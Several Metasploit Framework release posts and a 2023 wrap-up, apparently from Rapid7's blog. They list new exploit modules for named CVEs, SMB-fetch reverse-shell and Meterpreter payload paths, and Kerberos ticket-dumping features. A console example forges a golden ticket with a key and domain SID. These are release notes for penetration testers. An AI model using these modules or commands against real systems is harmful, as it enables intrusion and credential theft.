
Description: This adds a new encoder module that leverages base64 encoding to escape bad characters in ARCH_CMD payloads for the Linux and UNIX platforms.

SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager

Authors: Spencer McIntyre, bwatters-r7, and sf stephen_fewer@harmonysecurity.com
Type: Payload (Adapter)
Pull request: #18664 contributed by zeroSteiner

Description: This adds an SMB fetch-payload service and a new payload to use it. The payload invokes rundll32 but handles everything for the user automatically.

This adapter adds the following payloads:

cmd/windows/smb/x64/custom/bind_ipv6_tcp
cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid
cmd/windows/smb/x64/custom/bind_named_pipe
cmd/windows/smb/x64/custom/bind_tcp
cmd/windows/smb/x64/custom/bind_tcp_rc4
cmd/windows/smb/x64/custom/bind_tcp_uuid
cmd/windows/smb/x64/custom/reverse_http
cmd/windows/smb/x64/custom/reverse_https
cmd/windows/smb/x64/custom/reverse_named_pipe
cmd/windows/smb/x64/custom/reverse_tcp
cmd/windows/smb/x64/custom/reverse_tcp_rc4
cmd/windows/smb/x64/custom/reverse_tcp_uuid
cmd/windows/smb/x64/custom/reverse_winhttp
cmd/windows/smb/x64/custom/reverse_winhttps
cmd/windows/smb/x64/encrypted_shell/reverse_tcp
cmd/windows/smb/x64/encrypted_shell_reverse_tcp
cmd/windows/smb/x64/exec
cmd/windows/smb/x64/loadlibrary
cmd/windows/smb/x64/messagebox
cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp
cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid
cmd/windows/smb/x64/meterpreter/bind_named_pipe
cmd/windows/smb/x64/meterpreter/bind_tcp
cmd/windows/smb/x64/meterpreter/bind_tcp_rc4
cmd/windows/smb/x64/meterpreter/bind_tcp_uuid
cmd/windows/smb/x64/meterpreter/reverse_http
cmd/windows/smb/x64/meterpreter/reverse_https
cmd/windows/smb/x64/meterpreter/reverse_named_pipe
cmd/windows/smb/x64/meterpreter/reverse_tcp
cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4
cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid
cmd/windows/smb/x64/meterpreter/reverse_winhttp
cmd/windows/smb/x64/meterpreter/reverse_winhttps
cmd/windows/smb/x64/meterpreter_bind_named_pipe
cmd/windows/smb/x64/meterpreter_bind_tcp
cmd/windows/smb/x64/meterpreter_reverse_http
cmd/windows/smb/x64/meterpreter_reverse_https
cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp
cmd/windows/smb/x64/meterpreter_reverse_tcp
cmd/windows/smb/x64/peinject/bind_ipv6_tcp
cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid
cmd/windows/smb/x64/peinject/bind_named_pipe
cmd/windows/smb/x64/peinject/bind_tcp
cmd/windows/smb/x64/peinject/bind_tcp_rc4
cmd/windows/smb/x64/peinject/bind_tcp_uuid
cmd/windows/smb/x64/peinject/reverse_named_pipe
cmd/windows/smb/x64/peinject/reverse_tcp
cmd/windows/smb/x64/peinject/reverse_tcp_rc4
cmd/windows/smb/x64/peinject/reverse_tcp_uuid
cmd/windows/smb/x64/pingback_reverse_tcp
cmd/windows/smb/x64/powershell_bind_tcp
cmd/windows/smb/x64/powershell_reverse_tcp
cmd/windows/smb/x64/powershell_reverse_tcp_ssl
cmd/windows/smb/x64/shell/bind_ipv6_tcp
cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid
cmd/windows/smb/x64/shell/bind_named_pipe
cmd/windows/smb/x64/shell/bind_tcp
cmd/windows/smb/x64/shell/bind_tcp_rc4
cmd/windows/smb/x64/shell/bind_tcp_uuid
cmd/windows/smb/x64/shell/reverse_tcp
cmd/windows/smb/x64/shell/reverse_tcp_rc4
cmd/windows/smb/x64/shell/reverse_tcp_uuid
cmd/windows/smb/x64/shell_bind_tcp
cmd/windows/smb/x64/shell_reverse_tcp
cmd/windows/smb/x64/vncinject/bind_ipv6_tcp
cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid
cmd/windows/smb/x64/vncinject/bind_named_pipe
cmd/windows/smb/x64/vncinject/bind_tcp
cmd/windows/smb/x64/vncinject/bind_tcp_rc4
cmd/windows/smb/x64/vncinject/bind_tcp_uuid
cmd/windows/smb/x64/vncinject/reverse_http
cmd/windows/smb/x64/vncinject/reverse_https
cmd/windows/smb/x64/vncinject/reverse_tcp
cmd/windows/smb/x64/vncinject/reverse_tcp_rc4
cmd/windows/smb/x64/vncinject/reverse_tcp_uuid
cmd/windows/smb/x64/vncinject/reverse_winhttp
cmd/windows/smb/x64/vncinject/reverse_winhttps

Enhancements and features (7)

#18706 from sjanusz-r7 - Updates multiple PostgreSQL modules to now work with PostgreSQL sessions. This functionality is behind a feature flag which can be enabled with features set postgres_session_type true.
#18747 from zgoldman-r7 - Updates the auxiliary/scanner/mssql/mssql_login module with a new CreateSession option which controls the opening of an interactive MSSQL session. This functionality is currently behind a feature flag which can be enabled with features set mssql_session_type true.
#18759 from cgranleese-r7 - Updates the multiple MySQL modules to work with a provided MySQL session instead of opening a new connection. This functionality is behind a feature flag which can be enabled with features set mysql_session_type true.
#18763 from zgoldman-r7 - Updates multiple MSSQL modules to now work with the new MSSQL session type that is enabled with features set mssql_session_type true.
#18806 from cgranleese-r7 - Improves unknown command handling by suggesting similar valid commands.
#18809 from zeroSteiner - Makes multiple improvements to the dns command - a new command which mimics the functionality of /etc/resolv.conf and /etc/hosts. This functionality is currently behind a feature flag which can be enabled with features set dns_feature true in msfconsole.
#18825 from cgranleese-r7 - Improves the error messages when the current session is not compatible with a post module.

Bugs fixed (13)

#18616 from adfoster-r7 - This fixes an issue with the AARCH64 SO ELF template that was causing SIGBUS exceptions to be raised.
#18774 from adfoster-r7 - Updates the following modules to now work with newer versions of sqlcmd:
post/windows/gather/credentials/mssql_local_hashdump and post/windows/manage/mssql_local_auth_bypass.
#18786 from lihe07 - This fixes an option name collision between the exploit/linux/local/service_persistence when the payload is set to cmd/unix/reverse_netcat. The option to set the writable path is now BACKDOOR_PATH.
#18795 from cgranleese-r7 - Moves the CreateSession option from advanced into basic options for modules, in order to increase discoverability.
#18798 from upsidedwn - This fixes an issue in the exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move module's check method that was causing version comparisons to fail.
#18799 from upsidedwn - This fixes an issue in the exploit/windows/local/cve_2020_17136 module's check method that was causing version comparisons to fail.
#18800 from upsidedwn - This fixes an issue in the exploit/windows/local/cve_2021_40449 module's check method that was causing version comparisons to fail.
#18801 from upsidedwn - This fixes an issue in the exploit/windows/local/cve_2022_26904_superprofile module's check method that was causing version comparisons to fail.
#18812 from adfoster-r7 - Reverts the auxiliary/scanner/mssql/mssql_login modules's TDSENCRYPTION default value to false.
#18813 from adfoster-r7 - Fixes a crash when running the help services or help hosts commands.
#18823 from cdelafuente-r7 - Fix module metadata platform list comparison.
#18826 from dwelch-r7 - Fixes a regression where the windows/smb/psexec module was not correctly performing cleanup logic.
#18828 from dwelch-r7 - Fixes a crash when exploit modules used nops.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit 2023 Wrap-Up

Posted 9 months ago by Spencer McIntyre

As 2023 winds down, we’re taking another look back at all the changes and improvements to the Metasploit Framework. This year marked the 20th anniversary since Metasploit version 1.0 was committed and the project is still actively maintained and improved thanks to a thriving community.

Version 6.3

Early this year in January, Metasploit version 6.3 was released with a number of improvements for targeting Active Directory environments. The crowning achievement of this effort was the integration of native Kerberos authentication. With this in place, HTTP, LDAP, MSSQL, SMB and WinRM modules can all make use of Kerberos authentication, enabling a swath of new attack techniques and workflows. In addition to the existing modules that are now capable of authenticating with Kerberos, multiple Kerberos-specific modules were added as well for a variety of tasks such as requesting tickets from the Key Distribution Center (aka the KDC which is almost always the Active Directory Domain Controller), forging tickets from known secrets, and inspecting the contents of tickets.

This functionality was highlighted in Black Hat USA’s Arsenal demonstrations, a recording of which can be found online.

Fetch Based Payloads

In May 2023, Metasploit released a new set of payloads, dubbed the Fetch Payloads which make exploitation of OS-command-executing vulnerabilities easier for users. At the time of the release, about two-thirds of exploits added to the Metasploit Framework in the previous year resulted in the execution of an OS command, either due to direct injection or via some other means such as deserialization. While OS command execution is becoming more popular, it often limits the type of payloads that can easily be added to an exploit since the most advanced payloads, including Meterpreter, aren’t available as OS commands.

Prior to the Fetch Payloads, exploit authors were burdened with the work necessary to convert Meterpreter payloads to something deliverable as an OS command. This led to extra work and inconsistent implementations that often lacked the flexibility our users desire. The new pattern uses the Fetch Payloads, which allows the Framework to handle this automatically. The result is less work for exploit developers and a higher degree of control for end users. We expect to see Fetch Payloads continue to be used widely well past 2024 and to have new variants added.

Even More Kerberos Improvements

While the Metasploit 6.3 release provided support for native Kerberos authentication for Metasploit, we’ve since built on it to add even more. These features didn’t make it into the original 6.3 release in January but have since shipped in weekly releases:

The auxiliary/admin/kerberos/forge_ticket module was expanded to support the diamond and sapphire techniques in addition to the original golden and silver techniques.
The auxiliary/admin/kerberos/forge_ticket module was also updated to account for the additional fields used by Windows Server 2022, enabling its compatibility with the latest Windows targets.
We added the post/windows/manage/kerberos_tickets post module, which enables users to dump Kerberos tickets from a compromised host. This is similar functionality to what the popular Rubeus tool’s klist/dump commands do and operates entirely in memory. With this in place, users can now exploit instances of Unconstrained Delegation.
The auxiliary/gather/windows_secrets_dump module was updated to support pass-the-ticket authentication when using the DCSync technique (the DOMAIN action). This enables users to dump all of the secrets from the target given only a valid Kerberos ticket with the required permissions instead of requiring authentication by username and password.

Fewer DNS Leaks

One of the best features of Metasploit is the seamless way in which users can use established Meterpreter and SSH sessions to tunnel traffic as configured by the route command or often the post/multi/manage/autoroute module. Until this year, these connections would resolve hostnames to IP addresses from the system on which the Metasploit Framework was running, which could potentially leak information to listening parties. Thanks to a combined effort by sempervictus and smashery, Metasploit can now be configured to use a custom DNS server that is optionally accessed via an established session. This feature is currently behind a feature flag and requires users to run features set dns_feature true before it can be accessed.

Once enabled, the dns command allows users to configure how they would like to resolve DNS hostnames. Users can simply specify a single server to handle all queries, or use a wildcard syntax to send DNS queries for one domain to a specific server and non-matching queries to another. The weekly wrap up for the original release contains more detailed notes and usage examples.

Discoverability Improvements

A more recent change to the Framework brought a new feature to allow searching for more fields within modules. By enabling hierarchical search with features set hierarchical_search_table true, users will now find search queries that match module actions, targets, and AKA aliases. For example, this will cause the auxiliary/admin/kerberos/forge_ticket module to be included in the search results when forge_golden is the query because forging golden tickets is one of the actions that it supports.

Users can also discover new capabilities and how to use them by browsing our new docs site at docs.metasploit.com. This site’s source code is included within Metasploit itself, making it easy for users to contribute improvements and their own workflows.

Payload Improvements

Exploits are at the core of what we do on the Metasploit team, but they would be nothing without our payloads. This year saw multiple improvements to our payloads — some changes closed feature gaps, while others added net new functionality. Some highlights include:

Smashery updated our Java Meterpreter payloads with an important fix to the loader to enable compatibility with the latest versions of OpenJDK.
Salu90 added a new API to the Windows Meterpreter and a post module to use it that allows users to set the session’s token to a new value.
JustAnda7 updated the Windows Meterpreter to display IPv6 routes for inspection when the user runs the Meterpreter route command (not to be confused with the Framework route command).
Ishaanahuja7 added support to Meterpreter for running natively on Apple’s new ARM-based chips.
Sempervictus added native sessions for AWS Instance connections and AWS SSM agents. These session types are noteworthy because while they require access tokens, they do not require a payload to be run on the target and can be used to open a session on a target that Metasploit is otherwise unable to communicate with.
usiegl00 and Ishaanahuja7 both contributed enhancements to add support OSX AArch64 Meterpreter payloads, which enables the use of native payloads on M1 or M2 OSX devices that do not have Rosetta installed.

Additionally, GitHub Actions are now being used to measure the feature coverage of the Meterpreter API commands. It’s a lesser-known fact that the Meterpreter payload has multiple implementations for different architectures and platforms. This means some features may be present in one and not another. This is the reason the Mimikatz kiwi plugin isn’t available when the java/meterpreter/reverse_tcp payload is used. To help us and the community track this information, a report including a coverage matrix is now generated automatically. This report can be accessed by navigating to the project’s Actions tab, selecting “Acceptance”, the latest run, and finally downloading the “final-report”.

Module Highlights

CVE-2022-47966 – This particular vulnerability was an RCE in multiple ManageEngine products. A combined effort by cdelafuente-r7 and h00die-grey brought exploits for the ServiceDesk Plus, ADSelfService Plus, and Endpoint Central products.
CVE-2023-34362 (Exploit) – The MOVEit exploit leverages one of the more high-profile vulnerabilities to have been released this year. This module exploits a SQL injection to leak sensitive data in order to upload a .NET deserialization payload which results in code execution in the context of NT AUTHORITY\ SYSTEM and was a combined effort by sfewer-r7, rbowes-r7, and bwatters-r7.
CVE-2023-32560 (Exploit) – This vulnerability is an unauthenticated RCE in Ivanti Avalanche MDM that would result in code execution as NT AUTHORITY\SYSTEM. The module was submitted by EgeBalci and is one of the very few memory corruption exploits added this year.
CVE-2023-46214 (Exploit) – Chocapikk made their first contributions this year, one of which is for an authenticated RCE in Splunk Enterprise.
CVE-2023-22952
(Exploit) - This exploit was contributed by community member h00die-gr3y back in January of 2023. While it may seem like old news nearly a year later, this zero-day gained a lot of attention when it first came to light. This exploit brought along with it new mixin capabilities for Metasploit to embed PHP payloads in PNG images. This opens the door for future exploit modules to drop payloads inside of PNGs with ease.
CVE-2023-20887
(Exploit) - This module was added by community contributor sinsinology (with help from community contributor h00die). There were a few Metasploit modules released this year that targeted VMware products; however this one stands out above the rest. Targeting the popular VMware Aria Operations for Networks software, this module enabled attackers to gain unauthenticated code execution in the context of the root user on a wide range of affected software versions.
CVE-2023-27350
(Exploit) - Speaking of modules written for celebrity vulnerabilities, let’s not leave out the PaperCut NG Authentication Bypass, brought to the framework by Metasploit’s one and only Christophe De La Fuente. Christophe’s contribution helped pen testers better assess the security of systems hosting PaperCut NG and ease the concerns of their clients during a stressful time in the cybersecurity ecosystem. The module exploits all affected versions of PaperCut NG and returns an elevated Meterpreter session.
Post Module - Written by Spencer McIntyre of the Metasploit team, this module highlights the framework’s new, powerful Kerberos capabilities. Bringing along with it a large amount of railgun enhancements this module allows for Kerberos tickets to be exported from a compromised host and added to Metasploit’s own cache, allowing them to be used in subsequent attacks. The Kerberos work along with this module helps streamline many different types of attacks that can be performed in and around Domain environments. If you haven’t tested Metasploit's Kerberos authentication capabilities yet, put it at the top of your todo list for 2024!
CVE-2023-28252
(Exploit) - The Common Log File System (CLFS) driver is a fantastic vector for attacks; it’s installed on all the latest versions of Windows and saw more abuse in 2023. Ransomware gangs exploited this vulnerability to gain SYSTEM level access on Windows 10, 11 and Server 2022. Metasploit team member Jack Heysel wrote this module that uses the Reflective DLL template in order to drop a low level PoC which returns a session running in the context of NT AUTHORITY\SYSTEM.
CVE-2023-40044
(Exploit) - Another exploit that made big waves this year was the WS_FTP server running the Ad Hoc Transfer module .NET deserialization vulnerability. The module and the initial research behind how the vulnerability actually works was brought to us by Metasploit’s very own, veteran contributor, Stephen Fewer. The exploit module runs reliably on a wide range of affected targets. Everyone loves a module where all you have to do is: select the module, input the IP address of the machine running the vulnerable software, run the module, and get a SYSTEM-level session.

Contributors

We would like to give a big thank you to all of the contributors who sent us code in 2023. Whether it was bug fixes, enhancements, or exploits, we appreciate the work you put into making Metasploit better. In 2023, we received pull requests from the following 75 people (ordered by count). Of these, 49 made their first contribution to Metasploit this year.

h00die
bcoles
smashery
h00die-gr3y
jmartin-tech
ErikWynter
EgeBalci
ismaildawoodjee (new in 2023)
wvu
jvoisin
sempervictus
rorymckinley (new in 2023)
rad10
manishkumarr1017 (new in 2023)
Ryuuuuu (new in 2023)
prabhatjoshi321 (new in 2023)
Chocapikk (new in 2023)
Jemmy1228 (new in 2023)
AleksaZatezalo (new in 2023)
emirpolatt (new in 2023)
heyder
steve-embling
dm-ct (new in 2023)
ide0x90
archcloudlabs
samsepi0x0 (new in 2023)
Lorenyx (new in 2023)
MikeAnast (new in 2023)
loredous (new in 2023)
bradyjackson (new in 2023)
nfsec
HynekPetrak
whotwagner (new in 2023)
rtpt-erikgeiser
errorxyz (new in 2023)
e-lliot (new in 2023)
gcarmix (new in 2023)
j0ev (new in 2023)
xaitax (new in 2023)
cudalac (new in 2023)
bka-dev
cnnrshd (new in 2023)
pbarry25 (new in 2023)
D00Movenok (new in 2023)
gardnerapp (new in 2023)
rodnt (new in 2023)
hahwul (new in 2023)
JustAnda7
Guilhem7 (new in 2023)
shellchocolat (new in 2023)
sdcampbell (new in 2023)
attl4s (new in 2023)
distortedsignal (new in 2023)
spmedia (new in 2023)
YiDa858 (new in 2023)
j-baines (new in 2023)
catatonicprime
vtoutain (new in 2023)
SubcomandanteMeowcos (new in 2023)
samueloph (new in 2023)
araout42 (new in 2023)
Pflegusch (new in 2023)
tekwizz123
rohitkumarankam (new in 2023)
jeffmcjunkin
MegaManSec
bugch3ck
raboof (new in 2023)
JBince (new in 2023)
Frycos (new in 2023)
neterum (new in 2023)
mkonda (new in 2023)
serializingme (new in 2023)
k0pak4
npm-cesium137-io
hamax97 (new in 2023)

Metasploit Weekly Wrap-Up

Posted 10 months ago by Spencer McIntyre

Possible Web Service Removal

Metasploit has support for running with a local database, or from a remote web service which can be initialized with msfdb init --component webservice. Future versions of Metasploit Framework may remove the msfdb remote webservice. Users that leverage this functionality are invited to react on an issue currently on GitHub to inform the maintainers that the feature is used.

New module content (1)

ZoneMinder Snapshots Command Injection

Authors: UnblvR and whotwagner
Type: Exploit
Pull request: #18434 contributed by whotwagner
Path: unix/webapp/zoneminder_snapshots

Description: This PR adds an exploit module for an unauthenticated remote code execution vulnerability in the video surveillance software Zoneminder (CVE-2023-26035).

Enhancements and features (1)

#18440 from adfoster-r7 - This alerts users that the remote web service will be removed. It prompts them to respond to an issue on GitHub if the removal will affect them.

Bugs fixed (1)

#18532 from adfoster-r7 - Fixes db2 scanner module crashes.

Documentation added (1)

#18524 from bradyjackson - Updates the modules/payload/android/meterpreter/reverse_tcp.md example to use the correct flags when generating a payload.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

Posted 12 months ago by Spencer McIntyre

Improved Ticket Forging

Metasploit’s admin/kerberos/forge_ticket module has been updated to work with Server 2022. In Windows Server 2022, Microsoft started requiring additional new PAC elements to be present - the PAC requestor and PAC attributes. The newly forged tickets will have the necessary elements added automatically based on the user provided domain SID and user RID. For example:

msf6 auxiliary(admin/kerberos/forge_ticket) > run aes_key=4a52b73cf37ba06cf693c40f352e2f4d2002ef61f6031f64924fb50be1e23978 domain_sid=S-1-5-21-1242350107-3695253863-3717863007 USER_RID=500 domain=demo.local user=Administrator action=FORGE_GOLDEN

[*] TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230915213733_default_unknown_mit.kerberos.cca_219182.bin
[*] Primary Principal: Administrator@DEMO.LOCAL
Ccache version: 4

....
            Pac Requestor:
              SID: S-1-5-21-1242350107-3695253863-3717863007-500
            Pac Attributes:
              Flag length: 2
              Flags: 1
                .... .... .... .... .... .... .... ..0. Pac Was Requested: The PAC_WAS_REQUESTED bit is NOT SET
                .... .... .... .... .... .... .... ...1 Pac Was Given Implicitly: The PAC_WAS_GIVEN_IMPLICITLY bit is SET
            Pac Server Checksum:
              Signature: 1f94f52598b37bb9cf7e3995
            Pac Privilege Server Checksum:
              Signature: 79ec20b7d4b8e77e5c056563

The domain SID and user RIDs can be obtained using the auxiliary/gather/ldap_query module with the ENUM_DOMAIN and ENUM_ACCOUNTS actions.

New module content (5)

Apache Airflow 1.10.10 - Example DAG Remote Code Execution

Authors: Ismail E. Dawoodjee, Pepe Berba, and xuxiang
Type: Exploit
Pull request: #18283 contributed by ismaildawoodjee
Path: linux/http/apache_airflow_dag_rce

Description: This module exploits an unauthenticated command injection vulnerability by combining two critical vulnerabilities in Apache Airflow 1.10.10. The first, CVE-2020-11978, is an authenticated command injection vulnerability found in one of Airflow's example DAGs, example_trigger_target_dag, which allows any authenticated user to run arbitrary OS commands as the user running Airflow Worker/Scheduler. The second, CVE-2020-13927, is a default setting of Airflow 1.10.10 that allows unauthenticated access to Airflow's Experimental REST API to perform malicious actions such as creating the vulnerable DAG above.

Lexmark Device Embedded Web Server RCE

Authors: James Horseman, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #18333 contributed by jheysel-r7
Path: linux/http/lexmark_faxtrace_settings

Description: This adds an exploit module that leverages an unauthenticated remote code execution vulnerability in certain Lexmark devices through 2023-02-19. This vulnerability (CVE-2023-26068) is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked if they would like to add an Admin user.

TOTOLINK Wireless Routers unauthenticated remote command execution vulnerability

Authors: Kazamayc https://github.com/Kazamayc and h00die-gr3y h00die.gr3y@gmail.com
Type: Exploit
Pull request: #18365 contributed by h00die-gr3y
Path: linux/http/totolink_unauth_rce_cve_2023_30013

Description: This adds an exploit module that leverages a command insertion vulnerability in TOTOLINK X5000R Wireless Gigabit Router firmware X5000R_V9.1.0u.6118_B20201102. This allows remote code execution as the user running the webserver. This user is typically the root user.

Ivanti Avalanche MDM Buffer Overflow

Authors: A researcher at Tenable and Ege BALCI egebalci <Ege BALCI egebalci@pm.me>
Type: Exploit
Pull request: #18321 contributed by EgeBalci
Path: windows/misc/ivanti_avalanche_mdm_bof

Description: This PR adds an exploit module that targets Ivanti Avalanche MDM versions before v6.4.1, leveraging a buffer overflow condition.

Unix Command Shell, Reverse TCP (via socat)

Author: jheysel-r7
Type: Payload (Single)
Pull request: #18333 contributed by jheysel-r7
Path: cmd/unix/reverse_socat_tcp

Enhancements and features (5)

#18294 from zgoldman-r7 - Improves error messages when failing to interact with a network interface such as calling set LHOST=.
#18358 from zeroSteiner - This adds a new ThriftClient class for interacting with Thrift RPC services. It also updates the two existing Metasploit modules to use it.
#18361 from cgranleese-r7 - Updates the search command with additional the search keywords stage: :stager: and adapter:.
#18374 from h00die - Fixes a bug in 7 modules which specified the RelatedModules metadata incorrectly. Now the RelatedModules data is correctly shown to the user when running the info command.
#18377 from ErikWynter - This change adds a check to the smtp_relay auxiliary/scanner/smtp/smtp_relay scanner module to confirm if the EHLO command is supported by the server. If not, the module will try to initiate the session using the HELO command instead.

Bugs fixed (4)

#18359 from smashery - Updates the admin/kerberos/forge_ticket module to work with newer Windows Server releases, in particular post Windows Server October 2022. Now, when forging Golden tickets, the forged PAC contains a PAC requestor element with the forged user SID, and additional PAC attributes.
#18369 from adfoster-r7 - This PR fixes a crash with OptAddressLocal that was caused by darwin AF_LINK having an empty string for its addr.
#18370 from adfoster-r7 - This PR fixes an issue where msfrpc would hang when updating saved command history.
#18378 from adfoster-r7 - Removes fremaining debug logging from Prometheus Exporter.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Download Rapid7's 2023 Mid-Year Threat Report ▶︎

Metasploit Weekly Wrap-Up

Posted 1 year ago by Spencer McIntyre

Flask Cookies

This week includes two modules related to Flask cookie signatures. One is specific to Apache Superset where session cookies can be resigned, allowing an attacker to elevate their privileges and dump the database connection strings. While adding this functionality, community member h00die also added a module for generically working with the default session cookies used by Flask. This generic module auxiliary/gather/python_flask_cookie_signer allows for bruteforcing common signing keys from a wordlist as well as decoding cookies and resigning cookies if the key is known (or recovered).

New module content (12)

Apache Superset Signed Cookie Priv Esc

Authors: Naveen Sunkavally, Spencer McIntyre, h00die, and paradoxis
Type: Auxiliary
Pull request: #18180 contributed by h00die
Path: auxiliary/gather/apache_superset_cookie_sig_priv_esc
AttackerKB reference: CVE-2023-27524

Description: This adds two modules for targeting vulnerabilities related to the signing of Flask's session cookies. One of them exploits a vulnerability in Apache Superset which is identified as CVE-2023-27524.

Prometheus API Information Gather

Author: h00die
Type: Auxiliary
Pull request: #18290 contributed by h00die
Path: auxiliary/gather/prometheus_api_gather

Description: This PR creates two modules: one to interrogate Prometheus API endpoints for information and one to query Prometheus Node Exporters for information. This is supported by a new Prometheus library and specs.

Prometheus Node Exporter And Windows Exporter Information Gather

Author: h00die
Type: Auxiliary
Pull request: #18290 contributed by h00die
Path: auxiliary/gather/prometheus_node_exporter_gather

Description: This PR creates 2 modules: one to interrogate Prometheus API endpoints for information, the other to query Prometheus Node Exporters for information. This is supported by a new Prometheus library and specs.

Python Flask Cookie Signer

Authors: Spencer McIntyre, h00die, and paradoxis
Type: Auxiliary
Pull request: #18180 contributed by h00die
Path: auxiliary/gather/python_flask_cookie_signer

Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035)

Authors: James Horseman, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #18330 contributed by jheysel-r7
Path: exploits/linux/http/ivanti_sentry_misc_log_service
AttackerKB reference: CVE-2023-38035

Description: This PR adds an exploit module that targets Ivanti Sentry (formerly Mobileiron Sentry). Ivanti Sentry is vulnerable to an authentication by-pass which exposes API functionality,allowing for code execution in the context of the root user.

Kibana Timelion Prototype Pollution RCE

Authors: Gaetan Ferry, Michał Bentkowski, and h00die
Type: Exploit
Pull request: #18316 contributed by h00die
Path: exploits/linux/http/kibana_timelion_prototype_pollution_rce
AttackerKB reference: CVE-2019-7609

Description: Adds a module that exploits a prototype pollution vulnerability in the Kibana Timelion visualiser resulting in Remote Code Execution.

OpenTSDB 2.4.1 unauthenticated command injection

Authors: Daniel Abeles, Erik Wynter, and Gal Goldstein
Type: Exploit
Pull request: #18350 contributed by ErikWynter
Path: exploits/linux/http/opentsdb_key_cmd_injection
AttackerKB reference: CVE-2023-25826

Description: Adds a new module that exploits an unauthenticated command injection vulnerability in OpenTSDB through 2.4.1 resulting in root access.

VMware vRealize Log Insight Unauthenticated RCE

Authors: Ege BALCI and Horizon3.ai Attack Team
Type: Exploit
Pull request: #18273 contributed by EgeBalci
Path: exploits/linux/http/vmware_vrli_rce
CVE reference: ZDI-23-115

Description: This adds an exploit for VMware vRealize Log Insight versions prior to 8.10.2. It chains multiple vulnerabilities (CVE-2022-31706, CVE-2022-31704, CVE-2022-31711) together to achieve unauthenticated RCE.

Sonicwall

Authors: Ron Bowes and fulmetalpackets
Type: Exploit
Pull request: #18302 contributed by rbowes-r7
Path: exploits/multi/http/sonicwall_shell_injection_cve_2023_34124
AttackerKB reference: CVE-2023-34127

Description: This adds an exploit module that leverages a remote code execution in SonicWall GMS. Version 9.3.9320 (and likely earlier) is affected by this vulnerability identified as CVE-2023-34124.

WinRAR CVE-2023-38831 Exploit

Author: Alexander "xaitax" Hagenah
Type: Exploit
Pull request: #18341 contributed by xaitax
Path: exploits/windows/fileformat/winrar_cve_2023_38831
AttackerKB reference: CVE-2023-38831

Description: This PR adds a module covering CVE-2023-38831, a fileformat vulnerability affecting Winrar 6.22.

LG Simple Editor Remote Code Execution

Authors: Ege Balcı and rgod
Type: Exploit
Pull request: #18329 contributed by EgeBalci
Path: exploits/windows/http/lg_simple_editor_rce
CVE reference: ZDI-23-1204

Description: This module exploits broken access control and directory traversal vulnerabilities for achieving unauthenticated remote code execution on the LG Simple Editor versions <= v3.21. Module achieves code execution in the context of NT AUTHORITY\SYSTEM via uploading and executing a JSP payload.

Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability

Authors: Esteban.kazimirow, Ricardo Narvaja, and jheysel-r7
Type: Exploit
Pull request: #18250 contributed by jheysel-r7
Path: exploits/windows/local/cve_2023_28252_clfs_driver
AttackerKB reference: CVE-2023-28252

Description: Adds a new privilege escalation module that exploits a vulnerable clfs.sys driver on Windows to spawn a new NT AUTHORITY/SYSTEM Meterpreter session. The vulnerable driver comes installed by default on Windows 10 21H2, Windows 11 21H2 and Windows Server 2022 (Build 20348) operating systems.

Enhancements and features (8)

#17474 from prabhatjoshi321 - This PR adds support to the Capcom.sys driver LPE for Windows 11 21H1.
#18262 from cgranleese-r7 - Adds the ability to select favorite modules with the use command after running show favorites, similar to the search command.
#18270 from pbarry25 - Improves tab completion for the set and unset commands.
#18327 from h00die - Fixes an issue where specifying a TLS version in the ssl_version module would result in a NoMethodError.
#18349 from adfoster-r7 - Adds Meterpreter compatibility matrix generation to Github's acceptance test runs. Now, it's possible to visually see which Meterpreters support particular functionality.
#18354 from zeroSteiner - This PR moves the MSF tip to be displayed while Metasploit is loading. This is similar to what a lot of video games do (e.g. Skyrim).
#18356 from adfoster-r7 - This PR updates the Docker Golang version.
#18357 from adfoster-r7 - Adds additional error reporting to the Meterpreter integration tests.

Bugs fixed (2)

#17970 from YiDa858 - Fixes an error in nessus_db_import and nessus_scan_export commands that prevented them from completing successfully.
#18362 from adfoster-r7 - Fixes an edgecase which could cause a new msfrpc console instance to hang forever.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

Posted 1 year ago by Spencer McIntyre

Meterpreter Testing

This week’s release adds new payload tests to our automated test suite. This is intended to help the team and community members identify issues and behavior discrepancies before changes are made. Payloads run on a variety of different platforms including Windows, Linux, and OS X each of which has multiple Meterpreter implementations available that are now tested to help ensure consistency. This should improve payload stability and make testing easier for community members that are contributing new features to the payloads.

New module content (4)

H2 Web Interface Create Alias RCE

Authors: Nairuz Abulhul, gambler, h00die, and h4ckNinja
Type: Exploit
Pull request: #18226 contributed by h00die
Path: exploits/linux/http/h2_webinterface_rce

Description: This PR adds an exploit against the H2 database's web console. An authenticated user can issue requests to invoke built-in functionality to execute arbitrary code. There is no CVE for this issue.

Maltrail Unauthenticated Command Injection

Authors: Chris Wild and Ege BALCI
Type: Exploit
Pull request: #18280 contributed by EgeBalci
Path: exploits/unix/http/maltrail_rce

